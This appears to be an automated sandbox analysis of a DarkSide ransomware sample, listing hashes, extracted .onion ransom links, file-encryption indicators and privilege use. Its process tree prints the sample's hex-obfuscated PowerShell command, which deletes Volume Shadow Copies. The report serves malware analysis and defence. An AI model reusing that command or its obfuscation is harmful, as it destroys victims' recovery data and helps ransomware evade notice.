Analysis
-
max time kernel
41s -
max time network
66s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
11-05-2021 04:26
Static task
static1
Behavioral task
behavioral1
Sample
2.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
2.exe
Resource
win10v20210408
General
-
Target
2.exe
-
Size
40KB
-
MD5
78d080e27c4e75fbd8945af34a338958
-
SHA1
dfc4f8f01c18e8b9979ea1d5f67a2165a9de1e5d
-
SHA256
973dfafc3051d8c2849f62c556ab8057da706f15d1ffd8871de894ae3a24d86b
-
SHA512
a69fb8dd38bef3286173e9c86fa61435eb0b690d321488acbf3a986373bfffd90b256a4e57403686b72f8b3e998d506b4b80c2220b2570bdb425c543caa4bdc3
Malware Config
Extracted
C:\\README.4fa9c39d.TXT
darkside
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 26 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
2.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\SetStep.tiff.4fa9c39d 2.exe File renamed C:\Users\Admin\Pictures\SetUnlock.tiff => C:\Users\Admin\Pictures\SetUnlock.tiff.4fa9c39d 2.exe File opened for modification C:\Users\Admin\Pictures\AddUnlock.tif.4fa9c39d 2.exe File opened for modification C:\Users\Admin\Pictures\MoveExport.tif.4fa9c39d 2.exe File opened for modification C:\Users\Admin\Pictures\PushExit.tiff.4fa9c39d 2.exe File renamed C:\Users\Admin\Pictures\SetStep.tiff => C:\Users\Admin\Pictures\SetStep.tiff.4fa9c39d 2.exe File opened for modification C:\Users\Admin\Pictures\SetUnlock.tiff 2.exe File opened for modification C:\Users\Admin\Pictures\StepUnpublish.raw.4fa9c39d 2.exe File renamed C:\Users\Admin\Pictures\UnprotectApprove.tif => C:\Users\Admin\Pictures\UnprotectApprove.tif.4fa9c39d 2.exe File opened for modification C:\Users\Admin\Pictures\DenyUnlock.tiff 2.exe File opened for modification C:\Users\Admin\Pictures\DenyUnlock.tiff.4fa9c39d 2.exe File opened for modification C:\Users\Admin\Pictures\MountStart.png.4fa9c39d 2.exe File renamed C:\Users\Admin\Pictures\ReadAdd.raw => C:\Users\Admin\Pictures\ReadAdd.raw.4fa9c39d 2.exe File opened for modification C:\Users\Admin\Pictures\SendConvertFrom.png.4fa9c39d 2.exe File opened for modification C:\Users\Admin\Pictures\SetStep.tiff 2.exe File renamed C:\Users\Admin\Pictures\StepUnpublish.raw => C:\Users\Admin\Pictures\StepUnpublish.raw.4fa9c39d 2.exe File opened for modification C:\Users\Admin\Pictures\UnprotectApprove.tif.4fa9c39d 2.exe File renamed C:\Users\Admin\Pictures\AddUnlock.tif => C:\Users\Admin\Pictures\AddUnlock.tif.4fa9c39d 2.exe File renamed C:\Users\Admin\Pictures\DenyUnlock.tiff => C:\Users\Admin\Pictures\DenyUnlock.tiff.4fa9c39d 2.exe File renamed C:\Users\Admin\Pictures\PushExit.tiff => C:\Users\Admin\Pictures\PushExit.tiff.4fa9c39d 2.exe File renamed C:\Users\Admin\Pictures\SendConvertFrom.png => C:\Users\Admin\Pictures\SendConvertFrom.png.4fa9c39d 2.exe File opened for modification C:\Users\Admin\Pictures\SetUnlock.tiff.4fa9c39d 2.exe File renamed C:\Users\Admin\Pictures\MountStart.png => C:\Users\Admin\Pictures\MountStart.png.4fa9c39d 2.exe File renamed C:\Users\Admin\Pictures\MoveExport.tif => C:\Users\Admin\Pictures\MoveExport.tif.4fa9c39d 2.exe File opened for modification C:\Users\Admin\Pictures\PushExit.tiff 2.exe File opened for modification C:\Users\Admin\Pictures\ReadAdd.raw.4fa9c39d 2.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
2.exepowershell.exepid process 856 2.exe 856 2.exe 3088 powershell.exe 3088 powershell.exe 3088 powershell.exe 856 2.exe 856 2.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
2.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 856 2.exe Token: SeSecurityPrivilege 856 2.exe Token: SeTakeOwnershipPrivilege 856 2.exe Token: SeLoadDriverPrivilege 856 2.exe Token: SeSystemProfilePrivilege 856 2.exe Token: SeSystemtimePrivilege 856 2.exe Token: SeProfSingleProcessPrivilege 856 2.exe Token: SeIncBasePriorityPrivilege 856 2.exe Token: SeCreatePagefilePrivilege 856 2.exe Token: SeBackupPrivilege 856 2.exe Token: SeRestorePrivilege 856 2.exe Token: SeShutdownPrivilege 856 2.exe Token: SeDebugPrivilege 856 2.exe Token: SeSystemEnvironmentPrivilege 856 2.exe Token: SeRemoteShutdownPrivilege 856 2.exe Token: SeUndockPrivilege 856 2.exe Token: SeManageVolumePrivilege 856 2.exe Token: 33 856 2.exe Token: 34 856 2.exe Token: 35 856 2.exe Token: 36 856 2.exe Token: SeDebugPrivilege 3088 powershell.exe Token: SeBackupPrivilege 1568 vssvc.exe Token: SeRestorePrivilege 1568 vssvc.exe Token: SeAuditPrivilege 1568 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
2.exedescription pid process target process PID 856 wrote to memory of 3088 856 2.exe powershell.exe PID 856 wrote to memory of 3088 856 2.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"1⤵
- Modifies extensions of user files
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
010c219c46b4439bc787644989e20389
SHA1f3a63066ab4446458bd6417386777e39e09b9b25
SHA2562a7c264d94398912c720de578b6d959b2457582182b8f2cc98281f27ef6701aa
SHA512c6967d2a37b9a45f491138b638d99e5fa09ef38f680c887bfbc2336c683deae86f4d6626f6defc8c0aabccf545923a708df05825de8102086a8f333a58e74963
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
dc5df454cb15f62e18f0c88e659cdfcd
SHA1ef8a0a5e5ea979c162db052cabe4f739dfdca53f
SHA25689a82ad6970d21ab56171241bd3dcd0a4ec14550b1d9cb847b6a064f4ef5d075
SHA5125f15ee6e7a4f57ef6110c92c21239ddc1fc340e5a1098f8e20ff488dc250d3b7df74d7a0b2196d6b0c73e332c844b58c39efe4ad554229642b1954c4d41846d5
-
memory/3088-114-0x0000000000000000-mapping.dmp
-
memory/3088-119-0x00000184BF500000-0x00000184BF501000-memory.dmpFilesize
4KB
-
memory/3088-123-0x00000184C0160000-0x00000184C0161000-memory.dmpFilesize
4KB
-
memory/3088-129-0x00000184BF590000-0x00000184BF592000-memory.dmpFilesize
8KB
-
memory/3088-131-0x00000184BF593000-0x00000184BF595000-memory.dmpFilesize
8KB
-
memory/3088-132-0x00000184BF596000-0x00000184BF598000-memory.dmpFilesize
8KB